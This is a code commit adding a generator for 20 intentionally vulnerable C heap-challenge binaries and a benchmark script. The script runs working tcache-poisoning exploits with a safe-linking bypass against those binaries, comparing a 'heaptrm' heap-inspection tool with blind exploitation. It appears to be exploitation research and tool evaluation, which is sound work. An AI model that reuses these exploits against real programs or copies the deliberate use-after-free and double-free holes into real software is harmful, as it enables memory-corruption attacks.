20-challenge suite benchmark: heaptrm 65% vs blind 25% overall

Easy: 100% vs 75% (+25%), Medium: 83% vs 33% (+50%), Hard: 67% vs 0% (+67%).
heaptrm provides decisive advantage when binary lacks address leaks.
20 binaries with varying UAF read, addr leak, heap noise, slot count.

Files changed (2) hide show

cve_tests/gen_challenge_suite.py +241 -0
cve_tests/run_suite_benchmark.py +295 -0

cve_tests/gen_challenge_suite.py ADDED Viewed

	@@ -0,0 +1,241 @@

+#!/usr/bin/env python3
+"""
+gen_challenge_suite.py — Generate 20 heap challenge binaries with varying difficulty.
+Dimensions of variation:
+  - UAF read:     yes / no
+  - Address leak:  prints addrs / prints nothing / prints partial
+  - Heap noise:   none / light (2-3) / heavy (5-10)
+  - Size classes: 1 / 3 / 5
+  - Slot count:   4 / 8 / 16
+  - Edit size:    8 bytes / full chunk
+  - Double-free protection: yes / no
+"""
+import os
+import subprocess
+import random
+import json
+from pathlib import Path
+ROOT = Path(__file__).parent.parent
+OUT = ROOT / "cve_tests" / "suite"
+OUT.mkdir(exist_ok=True)
+TEMPLATE = r"""
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <time.h>
+#define MAX_SLOTS {max_slots}
+#define EDIT_MAX {edit_max}
+static int sizes[] = {{{sizes_str}}};
+static int n_sizes = {n_sizes};
+struct slot {{
+    char *data;
+    int size_idx;
+    int active;
+}};
+static struct slot slots[MAX_SLOTS];
+static void heap_noise(void) {{
+    srand(time(NULL) ^ getpid());
+    int n = {noise_min} + (rand() % {noise_range});
+    for (int i = 0; i < n; i++) {{
+        int sz = sizes[rand() % n_sizes];
+        char *p = malloc(sz);
+        memset(p, 'N', sz);
+        if (rand() % {noise_free_mod} == 0) free(p);
+    }}
+}}
+int main(void) {{
+    setbuf(stdin, NULL);
+    setbuf(stdout, NULL);
+    heap_noise();
+    int choice, slot, sc;
+    char hexbuf[520];
+    while (scanf("%d", &choice) == 1) {{
+        switch (choice) {{
+        case 1:
+            if (scanf("%d %d", &slot, &sc) != 2) break;
+            if (slot < 0 || slot >= MAX_SLOTS || sc < 1 || sc > n_sizes) {{ puts("ERR"); break; }}
+            if (slots[slot].data != NULL) {{ puts("ERR"); break; }}
+            slots[slot].data = malloc(sizes[sc-1]);
+            if (!slots[slot].data) {{ puts("ERR"); break; }}
+            memset(slots[slot].data, 0, sizes[sc-1]);
+            slots[slot].size_idx = sc-1;
+            slots[slot].active = 1;
+            {alloc_print}
+            break;
+        case 2:
+            if (scanf("%d %512s", &slot, hexbuf) != 2) break;
+            if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
+            {{
+                unsigned char bytes[256] = {{0}};
+                int len = strlen(hexbuf) / 2;
+                if (len > EDIT_MAX) len = EDIT_MAX;
+                for (int i = 0; i < len; i++) {{
+                    unsigned int b;
+                    sscanf(hexbuf + i*2, "%2x", &b);
+                    bytes[i] = (unsigned char)b;
+                }}
+                memcpy(slots[slot].data, bytes, len);
+            }}
+            puts("OK");
+            break;
+        case 3:
+            if (scanf("%d", &slot) != 1) break;
+            if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
+            {show_check}
+            {{
+                unsigned char *p = (unsigned char *)slots[slot].data;
+                int n = sizes[slots[slot].size_idx];
+                if (n > 32) n = 32;
+                for (int i = 0; i < n; i++) printf("%02x", p[i]);
+                puts("");
+            }}
+            break;
+        case 4:
+            if (scanf("%d", &slot) != 1) break;
+            if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
+            {double_free_check}
+            free(slots[slot].data);
+            slots[slot].active = 0;
+            {free_print}
+            break;
+        case 5:
+            goto done;
+        default:
+            puts("ERR");
+            break;
+        }}
+    }}
+done:
+    return 0;
+}}
+"""
+def gen_challenge(idx, config):
+    """Generate and compile one challenge binary."""
+    sizes = config["sizes"]
+    sizes_str = ", ".join(str(s) for s in sizes)
+    # UAF read protection
+    if config["uaf_read"]:
+        show_check = "/* UAF read allowed */"
+    else:
+        show_check = 'if (!slots[slot].active) { puts("DELETED"); break; }'
+    # Address leak on alloc
+    if config["addr_leak"] == "full":
+        alloc_print = 'printf("OK 0x%lx\\n", (unsigned long)slots[slot].data);'
+    elif config["addr_leak"] == "partial":
+        alloc_print = 'printf("OK %x\\n", (unsigned int)((unsigned long)slots[slot].data & 0xffff));'
+    else:
+        alloc_print = 'puts("OK");'
+    # Address leak on free
+    if config["addr_leak"] == "full":
+        free_print = 'printf("OK 0x%lx\\n", (unsigned long)slots[slot].data);'
+    else:
+        free_print = 'puts("OK");'
+    # Double-free protection
+    if config["double_free_prot"]:
+        double_free_check = 'if (!slots[slot].active) { puts("ERR"); break; }'
+    else:
+        double_free_check = "/* no double-free check */"
+    source = TEMPLATE.format(
+        max_slots=config["max_slots"],
+        edit_max=config["edit_max"],
+        sizes_str=sizes_str,
+        n_sizes=len(sizes),
+        noise_min=config["noise_min"],
+        noise_range=max(1, config["noise_max"] - config["noise_min"]),
+        noise_free_mod=config.get("noise_free_mod", 3),
+        alloc_print=alloc_print,
+        show_check=show_check,
+        free_print=free_print,
+        double_free_check=double_free_check,
+    )
+    name = f"chal_{idx:02d}"
+    src_path = OUT / f"{name}.c"
+    bin_path = OUT / name
+    src_path.write_text(source)
+    r = subprocess.run(
+        ["gcc", "-o", str(bin_path), str(src_path), "-std=c99", "-g", "-O0", "-Wno-all"],
+        capture_output=True, text=True,
+    )
+    if r.returncode != 0:
+        return None
+    # Save config
+    config["name"] = name
+    config["idx"] = idx
+    (OUT / f"{name}.json").write_text(json.dumps(config, indent=2))
+    return name
+def main():
+    random.seed(42)
+    challenges = []
+    # Generate 20 challenges with varying difficulty
+    configs = [
+        # Easy: UAF read, full leak, no noise
+        {"uaf_read": True, "addr_leak": "full", "noise_min": 0, "noise_max": 0, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "easy"},
+        {"uaf_read": True, "addr_leak": "full", "noise_min": 0, "noise_max": 0, "sizes": [0x20, 0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "easy"},
+        {"uaf_read": True, "addr_leak": "full", "noise_min": 0, "noise_max": 0, "sizes": [0x40], "max_slots": 16, "edit_max": 8, "double_free_prot": False, "difficulty": "easy"},
+        {"uaf_read": True, "addr_leak": "none", "noise_min": 0, "noise_max": 0, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "easy"},
+        # Medium: partial info, some noise
+        {"uaf_read": True, "addr_leak": "none", "noise_min": 2, "noise_max": 4, "sizes": [0x20, 0x40, 0x80], "max_slots": 8, "edit_max": 8, "double_free_prot": False, "difficulty": "medium"},
+        {"uaf_read": True, "addr_leak": "partial", "noise_min": 1, "noise_max": 3, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": True, "difficulty": "medium"},
+        {"uaf_read": False, "addr_leak": "full", "noise_min": 0, "noise_max": 2, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "medium"},
+        {"uaf_read": False, "addr_leak": "full", "noise_min": 2, "noise_max": 4, "sizes": [0x20, 0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": False, "difficulty": "medium"},
+        {"uaf_read": True, "addr_leak": "none", "noise_min": 3, "noise_max": 5, "sizes": [0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "medium"},
+        {"uaf_read": False, "addr_leak": "partial", "noise_min": 2, "noise_max": 5, "sizes": [0x20, 0x40, 0x80], "max_slots": 8, "edit_max": 16, "double_free_prot": False, "difficulty": "medium"},
+        # Hard: no UAF read, no leak, noise
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 3, "noise_max": 6, "sizes": [0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": False, "difficulty": "hard"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 3, "noise_max": 7, "sizes": [0x20, 0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": True, "difficulty": "hard"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 4, "noise_max": 8, "sizes": [0x20, 0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": False, "difficulty": "hard"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 5, "noise_max": 10, "sizes": [0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": True, "difficulty": "hard"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 3, "noise_max": 6, "sizes": [0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": False, "difficulty": "hard"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 5, "noise_max": 8, "sizes": [0x20, 0x40, 0x80], "max_slots": 8, "edit_max": 8, "double_free_prot": True, "difficulty": "hard"},
+        # Extreme: all mitigations, heavy noise, restricted
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 8, "noise_max": 12, "sizes": [0x40], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "extreme"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 6, "noise_max": 10, "sizes": [0x20, 0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "extreme"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 10, "noise_max": 15, "sizes": [0x40], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "noise_free_mod": 5, "difficulty": "extreme"},
+        {"uaf_read": False, "addr_leak": "none", "noise_min": 8, "noise_max": 12, "sizes": [0x20, 0x40, 0x80, 0x100, 0x200], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "extreme"},
+    ]
+    for i, config in enumerate(configs):
+        name = gen_challenge(i, config)
+        if name:
+            print(f"  [{config['difficulty']:8s}] {name}: uaf_read={config['uaf_read']} "
+                  f"leak={config['addr_leak']:7s} noise={config['noise_min']}-{config['noise_max']} "
+                  f"sizes={len(config['sizes'])} slots={config['max_slots']} edit={config['edit_max']}")
+            challenges.append(config)
+        else:
+            print(f"  FAILED: challenge {i}")
+    # Save manifest
+    (OUT / "manifest.json").write_text(json.dumps(challenges, indent=2))
+    print(f"\nGenerated {len(challenges)} challenges in {OUT}")
+if __name__ == "__main__":
+    main()

cve_tests/run_suite_benchmark.py ADDED Viewed

	@@ -0,0 +1,295 @@

+#!/usr/bin/env python3
+"""
+run_suite_benchmark.py — Benchmark heaptrm vs blind on 20 challenge binaries.
+"""
+import subprocess
+import json
+import struct
+import os
+import time
+from pathlib import Path
+from pwn import process as pwn_process, p64, u64, context
+context.log_level = "error"
+ROOT = Path(__file__).parent.parent
+SUITE = ROOT / "cve_tests" / "suite"
+HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm")
+TRIALS = 10
+def exploit_heaptrm(binary, config):
+    """Attempt exploit using heaptrm. Returns (success, turns)."""
+    turns = 0
+    sc = 1  # use first size class
+    for s in config["sizes"]:
+        if s == 0x40:
+            sc = config["sizes"].index(s) + 1
+            break
+    proc = subprocess.Popen(
+        [HEAPTRM, str(binary)],
+        stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, text=True
+    )
+    def cmd(action, data=""):
+        nonlocal turns
+        turns += 1
+        proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
+        proc.stdin.flush()
+        line = proc.stdout.readline()
+        return json.loads(line) if line else {}
+    try:
+        # Alloc 3
+        cmd("send", f"1 0 {sc}\n")
+        cmd("send", f"1 1 {sc}\n")
+        cmd("send", f"1 2 {sc}\n")
+        # Free 0 and 1
+        cmd("send", "4 0\n")
+        cmd("send", "4 1\n")
+        # Observe — get addresses
+        r = cmd("observe")
+        if not r.get("heap"):
+            cmd("quit"); return False, turns
+        chunks = r["heap"]["chunks"]
+        freed = sorted([c for c in chunks if c["state"] == "freed"],
+                       key=lambda c: int(c["address"], 16))
+        allocated = sorted([c for c in chunks if c["state"] == "allocated"],
+                          key=lambda c: int(c["address"], 16))
+        if len(freed) < 1 or not allocated:
+            cmd("quit"); return False, turns
+        # Find my chunks: the ones with highest addresses (after noise)
+        # Chunk 1 = last freed, target = first allocated after freed
+        chunk1_addr = int(freed[-1]["address"], 16)
+        target_addr = int(allocated[-1]["address"], 16)
+        # Safe-linking bypass
+        xor_key = chunk1_addr >> 12
+        poisoned = target_addr ^ xor_key
+        fd_hex = struct.pack("<Q", poisoned).hex()[:16]
+        # UAF write
+        cmd("send", f"2 1 {fd_hex}\n")
+        # Drain tcache
+        cmd("send", f"1 3 {sc}\n")
+        cmd("send", f"1 4 {sc}\n")
+        # Write marker through 4, check via 2
+        cmd("send", f"2 4 50574e454421210a\n")  # "PWNED!!\n"
+        r = cmd("send", "3 2\n")
+        cmd("quit")
+        # Check output for our marker
+        output = r.get("output", "")
+        if "50574e4544" in output:
+            return True, turns
+        return False, turns
+    except:
+        try: proc.kill()
+        except: pass
+        return False, turns
+def exploit_blind(binary, config):
+    """Attempt exploit without heaptrm. Returns (success, turns)."""
+    turns = 0
+    sc = 1
+    for s in config["sizes"]:
+        if s == 0x40:
+            sc = config["sizes"].index(s) + 1
+            break
+    p = pwn_process(str(binary))
+    turns += 1
+    def alloc(slot, size_class):
+        nonlocal turns; turns += 1
+        p.sendline(f"1 {slot} {size_class}".encode())
+        return p.recvline(timeout=0.5).strip()
+    def free_s(slot):
+        nonlocal turns; turns += 1
+        p.sendline(f"4 {slot}".encode())
+        return p.recvline(timeout=0.5).strip()
+    def edit(slot, hexdata):
+        nonlocal turns; turns += 1
+        p.sendline(f"2 {slot} {hexdata}".encode())
+        return p.recvline(timeout=0.5).strip()
+    def show(slot):
+        nonlocal turns; turns += 1
+        p.sendline(f"3 {slot}".encode())
+        return p.recvline(timeout=0.5).strip()
+    try:
+        r0 = alloc(0, sc)
+        r1 = alloc(1, sc)
+        r2 = alloc(2, sc)
+        # Extract addresses if binary leaks them
+        addr0 = addr1 = addr2 = None
+        for r, name in [(r0, "0"), (r1, "1"), (r2, "2")]:
+            if r and b"0x" in r:
+                try:
+                    addr_str = r.split(b"0x")[1].split()[0]
+                    addr = int(addr_str, 16)
+                    if name == "0": addr0 = addr
+                    elif name == "1": addr1 = addr
+                    elif name == "2": addr2 = addr
+                except: pass
+        free_s(0)
+        free_s(1)
+        # Try UAF read
+        leak_data = show(1)
+        leaked_fd = None
+        if leak_data and leak_data != b"DELETED" and leak_data != b"ERR" and len(leak_data) >= 16:
+            try:
+                leaked_fd = int(leak_data[:16], 16)
+            except: pass
+        # Determine what info we have
+        if addr1 and addr2:
+            # Full addr leak — compute directly
+            xor_key = addr1 >> 12
+            poisoned = addr2 ^ xor_key
+        elif leaked_fd and addr1:
+            # Have UAF read + alloc leak
+            xor_key = addr1 >> 12
+            poisoned = addr2 ^ xor_key if addr2 else 0
+        elif leaked_fd:
+            # UAF read only — try to decrypt with guessed key
+            guess_key = 0x555555559
+            decrypted = leaked_fd ^ guess_key
+            if 0x555555550000 < decrypted < 0x555555570000:
+                chunk0 = decrypted
+                chunk1 = chunk0 + 0x50
+                target = chunk1 + 0x50
+                poisoned = target ^ guess_key
+            else:
+                p.close(); return False, turns
+        elif addr0 and addr2:
+            # Alloc leak but no UAF read
+            xor_key = (addr0 + 0x50) >> 12  # guess chunk1 addr
+            poisoned = addr2 ^ xor_key
+        else:
+            # No info at all — must guess
+            guess_base = 0x555555559000
+            # Try a few offsets
+            for offset in [0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550, 0x600]:
+                chunk1_guess = guess_base + offset + 0x50
+                target_guess = chunk1_guess + 0x50
+                xor_key = chunk1_guess >> 12
+                poisoned = target_guess ^ xor_key
+                edit(1, p64(poisoned).hex()[:16])
+                alloc(3, sc)
+                alloc(4, sc)
+                edit(4, b"PWNED!!".hex())
+                result = show(2)
+                if result and b"50574e4544" in result:
+                    p.close(); return True, turns
+                p.close(); return False, turns
+        # Execute with computed poisoned fd
+        edit(1, p64(poisoned).hex()[:16])
+        alloc(3, sc)
+        alloc(4, sc)
+        edit(4, b"PWNED!!".hex())
+        result = show(2)
+        p.close()
+        return result and b"50574e4544" in result, turns
+    except:
+        try: p.close()
+        except: pass
+        return False, turns
+def main():
+    manifest = json.loads((SUITE / "manifest.json").read_text())
+    print("=" * 80)
+    print(f"SUITE BENCHMARK: heaptrm vs blind | {len(manifest)} challenges | {TRIALS} trials each")
+    print("=" * 80)
+    results = []
+    for config in manifest:
+        name = config["name"]
+        binary = SUITE / name
+        if not binary.exists():
+            continue
+        ht_wins = 0
+        bl_wins = 0
+        ht_turns = 0
+        bl_turns = 0
+        for t in range(TRIALS):
+            s, turns = exploit_heaptrm(binary, config)
+            ht_wins += int(s)
+            ht_turns += turns
+            s, turns = exploit_blind(binary, config)
+            bl_wins += int(s)
+            bl_turns += turns
+        r = {
+            "name": name,
+            "difficulty": config["difficulty"],
+            "uaf_read": config["uaf_read"],
+            "addr_leak": config["addr_leak"],
+            "noise": f"{config['noise_min']}-{config['noise_max']}",
+            "ht_rate": ht_wins / TRIALS,
+            "bl_rate": bl_wins / TRIALS,
+            "ht_turns": ht_turns / TRIALS,
+            "bl_turns": bl_turns / TRIALS,
+        }
+        results.append(r)
+        delta = r["ht_rate"] - r["bl_rate"]
+        marker = ">>>" if delta > 0.5 else "==" if abs(delta) < 0.1 else ">"
+        print(f"  {name} [{config['difficulty']:8s}] heaptrm={ht_wins}/{TRIALS} blind={bl_wins}/{TRIALS} "
+              f"leak={config['addr_leak']:7s} uaf={config['uaf_read']} noise={r['noise']} {marker}")
+    # Summary
+    print("\n" + "=" * 80)
+    print("SUMMARY BY DIFFICULTY")
+    print("=" * 80)
+    for diff in ["easy", "medium", "hard", "extreme"]:
+        group = [r for r in results if r["difficulty"] == diff]
+        if not group:
+            continue
+        ht_avg = sum(r["ht_rate"] for r in group) / len(group)
+        bl_avg = sum(r["bl_rate"] for r in group) / len(group)
+        print(f"  {diff:8s}: heaptrm={ht_avg*100:.0f}% blind={bl_avg*100:.0f}% "
+              f"delta={ht_avg*100-bl_avg*100:+.0f}% ({len(group)} challenges)")
+    # Overall
+    ht_total = sum(r["ht_rate"] for r in results) / len(results)
+    bl_total = sum(r["bl_rate"] for r in results) / len(results)
+    print(f"\n  OVERALL:  heaptrm={ht_total*100:.0f}% blind={bl_total*100:.0f}% "
+          f"delta={ht_total*100-bl_total*100:+.0f}%")
+    # Save
+    (SUITE / "benchmark_results.json").write_text(json.dumps(results, indent=2))
+if __name__ == "__main__":
+    main()